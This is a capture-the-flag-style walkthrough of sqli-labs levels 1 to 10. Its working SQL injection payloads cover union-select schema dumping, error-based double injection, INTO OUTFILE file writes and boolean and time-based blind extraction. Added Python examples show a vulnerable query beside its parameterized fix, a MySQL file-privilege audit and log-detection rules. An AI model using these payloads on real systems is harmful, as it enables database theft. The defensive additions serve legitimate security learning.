Less-1: single quotes
Append ?id=1' order by N%23 to the URL to guess the column count: with N=3 the page renders normally, with N=4 it errors, so there are 3 columns.
Then the union query:
?id=1' and 1=2 union select 1,2,3'#
This shows that the echoed (injectable) columns are 2 and 3.
Replacing 2 and 3 in union select 1,2,3 with user(), version() and database() in turn returns root@localhost, 10.1.19-MariaDB and security.
payload:
?id=1' and 1=2 union select 1,user(),version()'#
Dump the table names:
and 1=2 union select 1,group_concat(TABLE_NAME),3 from information_schema.tables where table_schema = database()%23
Table: emails,referers,uagents,users
Using this payload (the hex value is the table name found above):
and 1=2 union select 1,group_concat(COLUMN_NAME),3 from information_schema.columns where TABLE_NAME =0x7265666572657273 %23
This returns the column names of each table.
Since the database is the same for every level, no screenshots are included from here on.
Less-2: integer
Use ?id=1 order by N to find that there are 3 columns.
After the union query the injectable columns are again 2 and 3.
Querying database() and user() gives security and root@localhost respectively.
payload:
?id=1 and 1=2 union select 1,database(),user()
Query all table names:
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()
Query all column names:
?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73
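The root cause behind Less-1 and Less-2 is that the request value is spliced straight into the SQL string, so the quote-closing and union-select payloads above are parsed as SQL. The following is an added example, not code from the write-up or from sqli-labs: it reproduces the vulnerable query shape against an in-memory SQLite database with constructed sample rows (the table and rows are assumptions), and places the parameterized form beside it, plus an integer-only variant for the Less-2 style endpoint. The `--` comment in the test payload is used because SQLite does not understand MySQL's `#`.

```python
"""Added example (not from the write-up): string-concatenated lookup as in
Less-1/Less-2 next to its parameterized form, on an in-memory SQLite DB."""
import sqlite3

# Constructed sample data standing in for the lab's users table.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]


def make_db() -> sqlite3.Connection:
    """Build a throwaway database with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """Same shape as the lab: the request value is pasted into the SQL text,
    so a closing quote in raw_id ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT id, username, password FROM users WHERE id='{raw_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_safe(conn: sqlite3.Connection, raw_id: str):
    """Placeholder binding: the whole value is one string compared against id,
    never parsed as SQL, so quotes, union and comment markers have no effect."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (raw_id,)).fetchone()


def lookup_safe_int(conn: sqlite3.Connection, raw_id: str):
    """For an integer id (the Less-2 case): reject anything that is not a plain
    decimal integer before it gets anywhere near the query, then bind it."""
    try:
        id_value = int(raw_id, 10)
    except ValueError:
        return None
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (id_value,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "1' and 1=2 union select 1,2,3--"
    print("vulnerable:", lookup_vulnerable(db, payload))  # attacker-chosen row
    print("parameterized:", lookup_safe(db, payload))    # None: no such id
    print("integer-only:", lookup_safe_int(db, "1 and 1=2"))  # None: rejected
```

With the parameterized form there is no column count to probe and no echo position to find, because the value `1' and 1=2 union select 1,2,3--` is simply compared to `id` as text. The integer variant additionally rejects the Less-2 style payloads, which need no quote at all, before the database is involved.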
Less-3: single quotes with twist
Test the closing sequence; it turns out to be ')
?id=1') order by N%23
This reveals 3 columns; then the union query:
?id=1') and 1=2 union select 1,2,3%23
The injectable columns are 2 and 3.
Query user() and database():
?id=1') and 1=2 union select 1,user(),database()%23
Dump the tables:
?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()%23
Changing the table name accordingly dumps all the column names:
?id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73 %23
Less-4: Double Quotes
After testing, ?id=1" can be used to trigger the error.
Then close the statement and, at the same time, find the column count:
?id=1") order by N
There are 3 columns.
?id=1") and 1=2 union select 1,2,3%23
The injectable columns are 2 and 3.
Query user() and database():
?id=1") and 1=2 union select 1,user(),database()%23
Query the tables:
?id=1") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()%23
Dump the column names:
?id=1") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73 %23
Less-5: Double Injection-Single Quotes
Probe with ?id=1 and with ?id=1'; the latter errors, but adding %23 makes the error go away.
Once the structure is understood, ?id=1' order by N %23 shows there are 3 columns.
Just when I thought it was the same old routine, I found there is no echo when looking for the injection points, so I searched Baidu for blind injection and found a similar injection method:
http://www.freebuf.com/column/158705.html
Then I wrote an imitation of it:
?id=1' union select 1,count(*),concat(user(),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23
user() in the payload can be replaced with database() to query it.
Then query the table names:
?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23
The first number in limit 1,1 can be changed to 2 and 3 to get uagents and users respectively.
Then query the column names:
?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'referers' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23
Change the first number of limit 1,1 to query the column names one at a time, and change the table_name value to query the columns of each table.
Less-6: Double Injection Double Quotes
After testing, the principle is similar to Less-5; changing the single quotes in the Less-5 injection statements to double quotes is enough to inject successfully.
Less-7: Dump into outfile
After probing, no error message is shown; I looked at the source file.
It seems the error messages are deliberately hidden.
With no clue, I could only search Baidu:
https://blog.csdn.net/sherlock17/article/details/64454449
sqli-labs less-7
First I added secure_file_priv = "E:/text" to my.ini of the MySQL on my own machine (the file path is for reference only; where it goes in the file does not matter much, as long as it is not at the very beginning).
Then start injecting (from the earlier levels we know there are 3 columns; alternatively keep adding numbers to union select 1,2,3.. to find the column count):
?id=1')) union select 1,user(),database() into outfile "E:/text/main.txt" --+
The resulting external file:
Export the table names:
?id=1')) union select '*','*', table_name from information_schema.tables where table_schema='security' into outfile "E:/text/table.txt"--+
Export the column names (emails):
?id=1')) union select '*','*',column_name from information_schema.columns where table_schema='security' and table_name='emails' into outfile "E:/text/emails.txt"--+
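Less-7 only works because the author first set secure_file_priv to a writable directory; that single server option decides whether SELECT ... INTO OUTFILE can write anywhere the server process can, only under one directory, or nowhere at all. The following is an added example, not from the write-up or from sqli-labs: a small audit routine that reads the [mysqld] section of a my.ini/my.cnf text and classifies the setting. The three configuration texts are constructed (the lab-style one mirrors the E:/text value from the text above); the comment about server defaults reflects MySQL's change of default in 5.7.6 and MariaDB's empty default.

```python
"""Added example (not from the write-up): classify secure_file_priv in a
my.ini / my.cnf so a deployment that allows INTO OUTFILE / LOAD_FILE to
arbitrary paths is caught before anyone finds it the way Less-7 does."""
import re

# Constructed config texts for the three states of interest.
WEAK_CONFIG = """
[mysqld]
datadir=C:/mysql/data
secure_file_priv=
"""

LAB_CONFIG = """
[mysqld]
secure_file_priv = "E:/text"
"""

HARDENED_CONFIG = """
[mysqld]
secure-file-priv = NULL
"""


def mysqld_options(config_text: str) -> dict:
    """Return key/value pairs from the [mysqld] section only.
    Dashes and underscores are interchangeable in MySQL option names, and the
    last occurrence of a key wins, as the server itself does."""
    opts = {}
    section = None
    for line in config_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blanks
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section != "mysqld":
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        value = value.strip().strip('"').strip("'")
        opts[key] = value
    return opts


def classify_secure_file_priv(config_text: str) -> str:
    """One of: 'unset', 'unrestricted', 'disabled', 'restricted:<dir>'."""
    opts = mysqld_options(config_text)
    if "secure_file_priv" not in opts:
        # Server default applies: empty (no restriction) on MariaDB and on
        # MySQL before 5.7.6; later MySQL releases default to a fixed directory.
        return "unset"
    value = opts["secure_file_priv"]
    if value == "":
        return "unrestricted"  # INTO OUTFILE / LOAD_FILE may use any path
    if value.upper() == "NULL":
        return "disabled"      # import/export file operations refused entirely
    return "restricted:" + value.replace("\\", "/").rstrip("/")


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("lab", LAB_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name:9s} -> {classify_secure_file_priv(text)}")
```

For a server that never needs file import/export, NULL is the setting to keep; a restricted directory is acceptable only if the web server does not serve from it, since a file written there by INTO OUTFILE would otherwise be reachable over HTTP. The FILE privilege of the application's database account is the other half of the check and has to be reviewed in the server itself.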
Less-8: Blind-Boolean Based-Single Quotes
After several injection tests I found:
When the injected statement is correct, You Are in... appears; when the query errors, nothing is displayed.
Use ?id=1' order by N--+ to find that there are 3 columns.
Split each value up, test it character by character and then piece the characters together into the complete value; but entering every one by hand is tedious and time-consuming, and I don't know how to write a script to dump the data...
payload:
?id=1' and if(substr((select database()),1,1)='s',0,1)--+
substr(A,a,1) does the matching.
A is a statement you construct yourself; a is a number that starts at 1 and is incremented each time.
select database()
select '','',table_name from information_schema.tables where table_schema='security'
select '','',column_name from information_schema.columns where table_schema='security' and table_name='emails'
Less-9: Blind-Time Based-Single Quotes
Time-based blind injection (single quotes)
Whether or not the injected statement is correct, the page does not change. Add sleep(10) so that the page takes time to load when the match is correct, which makes the judgement possible.
?id=1' and if(substr(A,a,1)=x,0,sleep(10))%23
The structure is the same as above; if the match target x is a character it needs single quotes.
Less-10: Blind-Time Based-Double Quotes
Time-based blind injection (double quotes)
Just replace the single quotes in the Less-9 statements with double quotes.
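Every level from Less-1 to Less-10 leaves a distinctive trace in the web server's access log: quote-closing and order by probes, union select with information_schema, into outfile, and the sleep() calls of the time-based levels, which additionally show up as requests that take about as long as the sleep. The following is an added example, not from the write-up: a handful of detection rules run over constructed access-log lines. It assumes a combined-style log with one extra trailing field, the request time in seconds (for instance nginx's $request_time); the log lines, IP addresses and threshold are constructed.

```python
"""Added example (not from the write-up): flag the request shapes used in
Less-1 to Less-10 in constructed access-log lines. Assumes the log ends with
a request-time field in seconds (e.g. nginx $request_time)."""
import re
from urllib.parse import unquote_plus

# Constructed log lines: two benign requests and five modelled on the payloads above.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 715 0.003',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1%27%20order%20by%204%23 HTTP/1.1" 200 705 0.004',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/?id=1%27%20and%201=2%20union%20select%201,user(),version()%27%23 HTTP/1.1" 200 720 0.005',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-2/?id=1%20and%201=2%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20database() HTTP/1.1" 200 730 0.006',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-7/?id=1%27))%20union%20select%201,2,3%20into%20outfile%20%22E:/text/main.txt%22%20--+ HTTP/1.1" 200 700 0.004',
    '10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /Less-9/?id=1%27%20and%20if(substr((select%20database()),1,1)=%27s%27,0,sleep(10))%23 HTTP/1.1" 200 700 10.012',
    '10.0.0.9 - - [01/Jan/2024:10:00:16 +0000] "GET /Less-2/?id=2 HTTP/1.1" 200 715 0.002',
]

# Rules are applied to the URL-decoded query string; names are the alert labels.
RULES = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("file_write", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("time_delay", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("tautology", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("comment_tail", re.compile(r"(?:#|--\s)\s*$")),   # trailing %23 or --+
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) (?P<bytes>\d+) (?P<rt>[\d.]+)$'
)


def flag_line(line: str, slow_seconds: float = 5.0) -> list:
    """Return the rule names that fire for one log line (empty if none).
    'slow_response' is appended when the request time reaches the threshold,
    which together with 'time_delay' is the signature of Less-9/Less-10."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = unquote_plus(m.group("path").partition("?")[2])  # decodes %27, %23, + etc.
    hits = [name for name, rx in RULES if rx.search(query)]
    if float(m.group("rt")) >= slow_seconds:
        hits.append("slow_response")
    return hits


def scan(lines, slow_seconds: float = 5.0) -> list:
    """(ip, raw path, hits) for every line that triggered at least one rule."""
    flagged = []
    for line in lines:
        hits = flag_line(line, slow_seconds)
        if hits:
            m = LOG_RE.match(line)
            flagged.append((m.group("ip"), m.group("path"), hits))
    return flagged


if __name__ == "__main__":
    for ip, path, hits in scan(LOG_LINES):
        print(ip, ",".join(hits), path, sep="  ")
```

Decoding the query string before matching matters: the write-up's payloads arrive as %27, %23 and --+, and a rule that looks for a literal `#` in the raw request line never fires. A single slow request proves little on its own, but a slow request whose query also contains sleep( or benchmark( is worth an alert, and a burst of order by N probes from one source followed by union select is the column-counting phase described at the start of the write-up.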